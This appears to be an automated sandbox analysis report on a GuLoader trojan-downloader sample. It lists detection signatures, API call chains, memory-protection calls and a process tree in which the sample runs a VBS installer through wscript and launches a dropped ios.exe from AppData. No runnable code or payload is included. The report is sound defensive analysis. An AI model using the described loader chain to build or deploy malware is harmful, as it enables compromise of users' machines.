Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ios.exe_32bff45bee1557a39d49c4ca2c5bff414e93ae12_bcb1b634_99970dd0-5d80-4a04-b43a-60dbb6c644b1\Report.wer, type: DROPPED Matched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth, description = Detects a crashed application executed in a suspicious directory, reference = https://twitter.com/cyb3rops/status/1185585050059976705, score =
One or more processes crash
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 1072
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 25_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 26_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF 0_2_6F7C1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D1CD8 0_2_032D1CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6707 0_2_032C6707
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7B7A 0_2_032C7B7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C63A1 0_2_032C63A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C65A3 0_2_032C65A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CA5B0 0_2_032CA5B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C61B3 0_2_032C61B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C678C 0_2_032C678C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7D8C 0_2_032C7D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2191 0_2_032D2191
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C65FF 0_2_032C65FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2BF7 0_2_032D2BF7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C51D6 0_2_032C51D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7C34 0_2_032C7C34
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C0001 0_2_032C0001
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6201 0_2_032C6201
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C681D 0_2_032C681D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6879 0_2_032C6879
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6474 0_2_032C6474
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C664B 0_2_032C664B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7657 0_2_032C7657
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6253 0_2_032C6253
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C62B3 0_2_032C62B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D248D 0_2_032D248D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C628B 0_2_032C628B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C689F 0_2_032C689F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D16EF 0_2_032D16EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C62EF 0_2_032C62EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C64FF 0_2_032C64FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D28F6 0_2_032D28F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7CC5 0_2_032C7CC5
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01667B29 8_2_01667B29
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F9C4 8_2_0166F9C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664565 8_2_01664565
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664160 8_2_01664160
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F77 8_2_01663F77
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665343 8_2_01665343
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665920 8_2_01665920
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664337 8_2_01664337
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F3F 8_2_01663F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664509 8_2_01664509
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016705E2 8_2_016705E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016641EB 8_2_016641EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016643F3 8_2_016643F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F3DB 8_2_0166F3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663FDB 8_2_01663FDB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016659B1 8_2_016659B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166458B 8_2_0166458B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F9F 8_2_01663F9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665866 8_2_01665866
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166FE7D 8_2_0166FE7D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664478 8_2_01664478
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665A78 8_2_01665A78
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166801C 8_2_0166801C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01672219 8_2_01672219
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016708E3 8_2_016708E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663EED 8_2_01663EED
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016642EB 8_2_016642EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01662EC2 8_2_01662EC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166428F 8_2_0166428F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166408D 8_2_0166408D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00406D5F 25_2_00406D5F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_70FD1BFF 25_2_70FD1BFF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03301CD8 25_2_03301CD8
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6707 25_2_032F6707
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7B7A 25_2_032F7B7A
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F65A3 25_2_032F65A3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F63A1 25_2_032F63A1
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F61B3 25_2_032F61B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FA5B0 25_2_032FA5B0
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302191 25_2_03302191
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F678C 25_2_032F678C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7D8C 25_2_032F7D8C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302BF7 25_2_03302BF7
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F65FF 25_2_032F65FF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F51D6 25_2_032F51D6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7C34 25_2_032F7C34
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F0001 25_2_032F0001
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6201 25_2_032F6201
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F681D 25_2_032F681D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6879 25_2_032F6879
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6474 25_2_032F6474
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F664B 25_2_032F664B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7657 25_2_032F7657
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6253 25_2_032F6253
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F62B3 25_2_032F62B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F628B 25_2_032F628B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F689F 25_2_032F689F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0330248D 25_2_0330248D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F62EF 25_2_032F62EF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033028F6 25_2_033028F6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F64FF 25_2_032F64FF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033016EF 25_2_033016EF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7CC5 25_2_032F7CC5
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00406D5F 26_2_00406D5F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_70FC1BFF 26_2_70FC1BFF
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: String function: 00402DA6 appears 52 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D3A91 NtProtectVirtualMemory, 0_2_032D3A91
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D1CD8 LoadLibraryA,NtAllocateVirtualMemory, 0_2_032D1CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0167177D NtProtectVirtualMemory, 8_2_0167177D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 NtProtectVirtualMemory,LoadLibraryA, 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F9C4 LoadLibraryA,NtAllocateVirtualMemory, 8_2_0166F9C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016664D0 NtSetInformationProcess, 8_2_016664D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F NtProtectVirtualMemory,LoadLibraryA, 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C NtProtectVirtualMemory, 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664160 NtProtectVirtualMemory, 8_2_01664160
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F77 NtProtectVirtualMemory, 8_2_01663F77
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664337 NtProtectVirtualMemory, 8_2_01664337
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F3F NtProtectVirtualMemory, 8_2_01663F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664509 NtProtectVirtualMemory, 8_2_01664509
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016641EB NtProtectVirtualMemory, 8_2_016641EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016643F3 NtProtectVirtualMemory, 8_2_016643F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663FDB NtProtectVirtualMemory, 8_2_01663FDB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F9F NtProtectVirtualMemory, 8_2_01663F9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664478 NtProtectVirtualMemory, 8_2_01664478
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663EED NtProtectVirtualMemory, 8_2_01663EED
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016642EB NtProtectVirtualMemory, 8_2_016642EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166428F NtProtectVirtualMemory, 8_2_0166428F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166408D NtProtectVirtualMemory, 8_2_0166408D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03304010 NtResumeThread, 25_2_03304010
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03303A91 NtProtectVirtualMemory, 25_2_03303A91
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03301CD8 LoadLibraryA,NtAllocateVirtualMemory, 25_2_03301CD8
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\ios.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDIFxAPI.dllp( vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameportaudio_x64.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1355375657.000000001D3FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1355375657.000000001D3FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
PE file contains strange resources
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ios.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: invalid certificate
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Jump to behavior
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ios.exe "C:\Users\user\AppData\Roaming\ios.exe"
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 1072
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
